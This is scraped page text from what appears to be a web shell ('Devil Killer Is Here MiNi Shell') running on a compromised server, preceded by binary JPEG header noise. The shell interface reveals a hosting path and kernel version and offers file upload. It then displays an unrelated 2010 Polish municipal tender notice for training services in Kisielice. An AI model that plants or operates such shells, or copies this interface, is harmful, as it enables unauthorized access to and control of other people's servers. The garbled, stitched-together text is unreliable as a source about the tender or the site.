JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100513/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100513/129470-N-2010.html

<p class="kh_header"><b>Kisielice: Usługi szkoleniowe dla osób, z którymi zostaną zawarte kontrakty socjalne oraz usługi szkoleniowe w ramach programu Aktywności Lokalnej dla osób niepełnosprawnych</b><br>
<b>Numer ogłoszenia: 129470 - 2010; data zamieszczenia: 13.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej , ul. Sienkiewicza 18, 14-220 Kisielice, woj. warmińsko-mazurskie, tel. 0-55 2756441, faks 0-55 2756441.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> mgops.kisielice@kisielice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkoleniowe dla osób, z którymi zostaną zawarte kontrakty socjalne oraz usługi szkoleniowe w ramach programu Aktywności Lokalnej dla osób niepełnosprawnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa zorganizowania i przeprowadzenia szkolenia i warsztatów aktywizacji zawodowej, społecznej i zdrowotnej dla 23 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Iławie Filia w Kisielicach oraz nieaktywnych zawodowo, z którymi zostaną zawarte kontrakty socjalne. Catering i dojazdy na szkolenia z miejsca zamieszkania do miejscowości, w której będą prowadzone szkolenia. Nazwa Szkolenia Usługi szkoleniowe dla osób, z którymi zostaną zawarte kontrakty socjalne. Warsztaty obejmują: Aktywizacja Zawodowa:-warsztaty z zakresu doradztwa zawodowego i okreslenia IPD-24 godz/grupę, warsztaty efektywnego poszukiwania pracy-24 godz/grupę. Aktywizacja Społeczna:-trening kompetencji inerpersonalnych i autiprezentacji-32 godz/grupę (nabycie umiejętności radzenia sobie w sytuacjach społecznych rozwijanie twórczych relacji i zwiazków z innymi osobami kreowanie wizerunku i autoprezentacji zawodowej)-warsztaty kreatywnego myślenia-16 godz./grupę(technik twórczego myślenia znalezienie w sobie potencjału by być kreatywnym, twórczość, jako praca i relaks)-warsztaty rozwiązywania problemów emocjonalnych, konfliktów rówieśniczych oraz radzenia sobie w sytuacjach trudnych(w tym profilaktyka uzależnień)-24 godz(wspólnezdefiniowanie problemu i rozwiązywania go radzenia sobie z uczuciami, rozumowanie mechanizmu powstawania uzależnień)-wyjazdowy warsztat rozwoju osobistego potencjału ( w tym budowanie zespołu i zainicjowanie utworzenia-Klubu Młodzieżowego)-16 godz./grupę.Wyjazdowe Spotkania Klubu Młodzieżowego-6 spotkań po 4 godz.(24 godz.) Dodatkowo grupa 23 osób skorzysta z indywidualnych konsultacji specjalistycznych (psycholog, pedagog, terapeuta)-46 godz.(2 godz./osobę). Aktywizacja Zdrowotna:-warsztaty pierwszej pomocy przedmedycznej-16 godz/grupę (zasady udzielania pierwszej pomocy w różnych sytuacjach zagrażających życiu, nauka RKO i PPŻ) Ogółem:152 godz.-warsztatów szkoleniowych, 46 godz.-konsultacji indywidualnych ( 2 godz.-1 osoba), 24 godz.-prowadzenie Klubu Młodzieżowego. Zamawiający zobowiązuje Wykonawcę do zapewnienia: 1) Cateringu dla 23 osób, który składa się z herbaty, kawy, zimnych napoi, ciastek oraz obiadu jednodaniowego-II danie. 2)Dowozu osób na szkolenia z miejsca zamieszkania do miejscowości, w której prowadzone bedzie szkolenie.Wykaz miejscowości zamieszkania oraz liczba osób: -Butowo-1 osoba, Łodygowo-2 osoby, Nowy Folwark-3 osoby, Ogrodzieniec-3 osoby, Łęgowo-1 osoba, Pławty Wielkie-1 osoba, Jedrychowo-2 osoby, Goryń-3 osoby, Kantowo-1 osoba, Wola-1 osoba, Kisielice-5 osób. Liczba osób może ulec zmianie w przypadku rezygnacji z uczestnictwa w szkoleniu. 3) Wykonawca zbowiazany jest do ubezpieczenia od nieszczęsliwych wypadków wszystkie osoby biorace udział w szkoleniach.4) Wykonawca przeprowadzi ankietę ewaluacyjną na poczatku i na końcu szkoleń z uwzględnieniem rezultatów miękkich stanowiących załącznik nr 11.5)Zamówienie obejmuje w zakresie merytorycznym i organizacyjnym: 1)Przygotowanie przez Wykonawcę programu zajęć jak również harmonogramu zajęć teoretycznych praktycznych oraz przedstawienie ich do zatwierdzenia przez Zamawiającego najpóżniej na 2 dni przed podpisaniem umowy. Harmonogram zajęć powinien zawierać: tematykę zajęć, liczbę godzin, miejsce realizacji szkolenia oraz nazwisko osoby prowadzącej zajecia w każdym dniu szkolenia. 2)Prowadzenie szkolenia zgodnie z programem i harmonogramem szkolenia. 3)Prowadzenie dokumentacji przebiegu szkolenia stanowiącej: -dziennik zajęć edukacyjnych zawierajacy listę obecności, wymiar godzin i tematy zajęć edukacyjnych.Godzina dydaktyczna to 45 minut. Zajecia powinny trwać nie dłużej niż do godz.15,00 z uwzględnieniem przerw w zajęciach. 4)Zapewnienie przez Wykonawcę uczestnikom szkolenia niezbędnych materiałów szkoleniowych, które zostaną ujete w koszcie szkolenia i po jego zakończeniu przejdą w posiadanie uczestników szkolenia. 5)Systematyczna ocenę postepów uczestników szkolenia, indywidualizacji, kształcenia wobec osób mających trudności w procesie nauczania. 6)Zapewnienie sali szkoleniowej do przeprowadzenia zajęć, wyposażonej w odpowiednią liczbę miejsc i stolików dostosowaną do ilości osób szkolonych wraz z zapleczem sanitarnym. 7)Zapewnienie odpowiedniego wyposażenie sal:flip chart lub tablica klasyczna czy magnetyczna, sprzęt audiowizualny.8)Promocję Europejdskiego Funduszu Społecznego poprzez umieszczenie logo EPS, UE, POKL na: -materiałach szkoleniowych oraz w salach, w których będzie odbywało się szkolenie, -wydawanych zaświadczeniach lub certyfikatach informacji szkolenie współfinansowane ze środków EFS w ramach Programu Operacyjnego Kapitał Ludzki, Podziałanie 7.1.1 9)Bieżącego informowania Zamawiajacego o przypadkach nieobecności osób na szkoleniu w trakcie jego trwania. 10) Zapewnienie możliwości kontroli przebiegu szkolenia uprawnionemu pracownikowi MGOPS. 11)Przkazanie Zamawiającemu w terminie 7 dni po zakończeniu szkolenia: -oryginałów list obecności, imiennego wykazu osób, które nie ukończyły szkolenia, -kserokopii zaświadczeń (lub innych dokumentów) świadczacych o ukończeniu szkolenia, kserokopi dziennika zajęć,12)Szkolenie winno zakończyć się wydaniem: -zaświadczenia o jego ukończeniu zgodnie z rozporzadzeniem Min.Nauki z dnia 3.02.2006r. w sprawie uzyskiwania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U Nr 131, poz.216)-certyfikatu z logo Unii Europejskiej i Europejskiego Funduszu Społecznego oraz logo Programu Operacyjnego Kapitał Ludzki powierdzającego ukończenia szkolenia. 13) Czas realizacji szkolenia: czerwiec- listopad 2010r. Przedmiotem zamówienia jest usługa zorganizowania i przeprowadzenia szkolenia i warsztatów aktywizacji zawodowej, społecznej i zdrowotnej w ramach Programu Aktywności Lokalnej dla 11 osób niepełnosprawnych. Catering i dojazdy na szkolenia z miejscowości zamieszkania do miejscowości, w której będą prowadzone szkolenia. Nazwa szkolenia Usługi szkoleniowe w ramach programu Aktywności lokalnej dla osób niepełnosprawnych Warsztaty obejmują: Aktywizacja Zawodowa:-warsztaty z zakresu doradztwa zawodowego prowadzone przez doradcę zawodowego-16 godz/grupę. Aktywizacja Społeczna: -trening kompetencji interpersonalnych i społecznych-32 godz./grupę, -warsztaty autoprezentacji z elementami wizażu-8 godz/grupę, -warsztaty rozwiązywania problemów i radzenia sobie w sytuacjach trudnych(źródła, przyczyny problemy rozwiązywania ich, rozumienie natury stresu, radzenia sobie w sytuacjach trudnych, mechanizm powstawania uzależnień)-16 godz. -warsztaty rozwoju osobistego potencjału (celem wzbudzenie motywacji do działania, podejmowanie współpracy i wzajemna pomoc )-24 godz/grupę, Spotkania grupy wsparcia-6 spotkań po 4 godz.(24 godz.)-indywidualne konsultacje specjalistyczne-22 godz./grupę(2 godz./na osobę).Ogółem: 96 godz.-warsztatów szkoleniowych, 22 godz.-indywidualnych konsultacji specjalistycznych-psycholog, pedagog, terapeuta (2 godz./1 osobę), 24 godz.-prowadzenie grupy wsparcia.2) Zamawiający zobowiązuje Wykonawcę do zapewnienia: 1)Cateringu dla 11 osób, który składa się z herbaty, kawy, zimnych napoi, ciastek oraz obiadu jednodaniowego-II danie. 2)Dowozu osób środkiem transportu na szkolenia z miejsca zamieszkania do miejscowości, w której prowadzone będzie szkolenie. Wykaz miejscowości zamieszkania oraz liczba osób: -Butowo-1 osoba, Pławty Wielkie-1 osoba, Jędrychowo-1 osoba, Goryń-2 osoby, Klimy-2 osoby, Kisielice-4 osoby.Liczba osób może ulec zmianie w przypadku rezygnacji z uczestnictwa w szkoleniu. 3)Wykonawca zobowiązany jest do ubezpieczenia od nieszczęśliwych wypadków wszystkie osoby biorace udział w szkoleniach. 4) Wykonawca przeprowadzi ankietę ewaluacyjna na poczatku i na końcu szkoleń z uwzględnieniem rezultatów miękkich stnowiących załącznik nr 11. 5)Zamówienie obejmuje w zakresie merytorycznym i organizacyjnym: 1)Przygotowanie przez Wykonawcę programu zajęć jak również harmonogramu zajęć teoretycznych oraz przedstawienie ich do zatwierdzenia przez Zamawiającego najpóżniej na 2 dni przed podpisaniem umowy. Harmonogram zajęć powinien zawierać : tematyke zajęć, liczbę godzin, miejsce realizacji szkolenia oraz nazwisko osoby prowadzącej zajęcia w każdym dniu szkolenia. 2)Prowadzenie szkolenia zgodnie z programem i harmonogramem szkolenia. 3)Prowadzenie dokumentacji przebiegu szkolenia stanowiącej: -dziennik zajęć edukacyjnych zawierajacy listę obecności, wymiar godzin i tematy zajęćedukacyjnych.Godzina dydaktyczna to 45 minut. Zajęcia powinny trwać nie dłużej niz do godz.15 z uwzględnieniem przew.4) Zapewnienie przez Wykonawcę uczestnikom szkolenia niezbednych materiałów szkoleniowych, które zostaną ujęte w koszcie szkolenia i po jego zakończeniu przejdą w posiadanie uczestników szkolenia. 5)Systematyczną ocenę postępów uczestników szkolenia, indywidualizacji, kształcenia wobec osób mających trudności w procesie nauczania. 6) Zapewnienie sali szkoleniowej do przeprowadzenia zajęć, wyposażonej w odpowiednią liczbę miejsc i stolików dostosowaną do ilości osób szkolonych wraz z zapleczem sanitarnym. 7)Zapewnienie odpowiedniego wyposażenia sal:flip chart lub tabilca klasyczna czy magnetyczna, sprzęt audiowizualny. PromocjęEuropejskiego Funduszu Społecznego poprzez umieszczenie logo EPS, UE, POKL na -materiałach szkoleniowych oraz w salach, w których będzie odbywało się szkolenie, -wydawanie zaświadczeniach lub certyfikatach informacji szkolenie współfinansowane ze środków EFS w ramach Programu Operacyjnego Kapitał Ludzki, Poddziałanie 7.1.1. 9) Bieżącego informowania Zamawiającego o przypadkach nieobecności osób na szkoleniu w trakcie jego trwania.10) Zapewnienie możliwości kontroli przebiegu szkolenia uprawnionemu pracownikowi MGOPS. 11)Przekazanie Zamawiającemu w terminie 7 dni po zakończeniu szkolenia: -oryginałów list obecności, -imiennego wykazu osób, które nie ukończyły szkolenia, kserokopii zaświadczeń (lub innych dokumentów) świadczących o ukończeniu szkolenia, kserokopii dziennika zajęć, 12) Szkolenie winno zakończyć się wydaniem: zaświadczenia o jego ukończeniu zgodnie z rozporządzeniem Min.Nauki z dnia 3.02.2006r. w sprawie uzyskiwania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętnści i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U Nr 131, poz.216) -certyfikatu z logo Unii Europejskiej i Europejskiego Funduszu Społecznego oraz logo Programu Operacyjnego Kapitał Ludzki potwierdzającego ukończenie szkolenia. 13) Czas realizacji szkolenia : czerwiwc-październik 2010r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 11.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków szczegółowych nastąpi na podstawie przedstawionych przez Wykonawce dokumentów i oświadczeń. Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z formą spełnienia nie spełnia w oparciu o informację zawarte w dokumentach i oświadczeniach dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać, że Wykonawca spełnia wymienione warunki.W przypadku watpliwości, co do treści dokumentów złożonych przez Wykonawcę  na potwierdzenie spełenienia warunków udziału w postępowaniu Zamawiający może wezwać  Wykonawców w określonym przez siebie terminie do złożenia wyjaśnień. W celu potwiedzenia spelnienia warunku udziału w postepowaniu Wykonawca musi dostarczyć dokumenty:
1.Pasiadanie certygikatów uprawniajacych do prowadzenia szkoleń, zgodnie z tematyka szkoleń. 2. Aktualny wpis do rejestru instytucji szkoleniowych we właściwym miejscowo Wojewódzkim Urzędzie Pracy, na podstawie art.20 Ustawy o promocji zatrudnienia i instytucjach ranku pracy z dnia 20 kwietnia 2004. (Dz.U z 2008r. Nr 69 poz.415 z późn.zmian.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków szczegółowych nastąpi na podstawie przedstawionych przez Wykonawce dokumentów i oświadczeń. Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z formą spełnienia nie spełnia w oparciu o informację zawarte w dokumentach i oświadczeniach dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać, że Wykonawca spełnia wymienione warunki.W przypadku watpliwości, co do treści dokumentów złożonych przez Wykonawcę  na potwierdzenie spełenienia warunków udziału w postępowaniu Zamawiający może wezwać  Wykonawców w określonym przez siebie terminie do złożenia wyjaśnień.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków szczegółowych nastąpi na podstawie przedstawionych przez Wykonawce dokumentów i oświadczeń. Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z formą spełnienia nie spełnia w oparciu o informację zawarte w dokumentach i oświadczeniach dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać, że Wykonawca spełnia wymienione warunki.W przypadku watpliwości, co do treści dokumentów złożonych przez Wykonawcę  na potwierdzenie spełenienia warunków udziału w postępowaniu Zamawiający może wezwać  Wykonawców w określonym przez siebie terminie do złożenia wyjaśnień.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków szczegółowych nastąpi na podstawie przedstawionych przez Wykonawce dokumentów i oświadczeń. Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z formą spełnienia nie spełnia w oparciu o informację zawarte w dokumentach i oświadczeniach dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać, że Wykonawca spełnia wymienione warunki.W przypadku watpliwości, co do treści dokumentów złożonych przez Wykonawcę  na potwierdzenie spełenienia warunków udziału w postępowaniu Zamawiający może wezwać  Wykonawców w określonym przez siebie terminie do złożenia wyjaśnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków szczegółowych nastąpi na podstawie przedstawionych przez Wykonawce dokumentów i oświadczeń. Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z formą spełnienia nie spełnia w oparciu o informację zawarte w dokumentach i oświadczeniach dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać, że Wykonawca spełnia wymienione warunki.W celu potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawca musi dostarczyć dokumenty:1)Oświadczenie Wykonawcy, że Zakład nie jest w likwidacji ani nie ogłoszono upadłości wystawiony nie wcześniej niż 6 m-cy przed upływem terminu składaniu wniosku o dopuszczenie do udziału w postępowaniu o udzieleniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie Wykonawcy-wykaz wykonanych szkoleń w okresie 3 lat. - 10</li>
<li>3 - Kwalifikacje kadry dydaktycznej - 10</li>
<li>4 - Doświadczenie kadry dydaktycznej - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
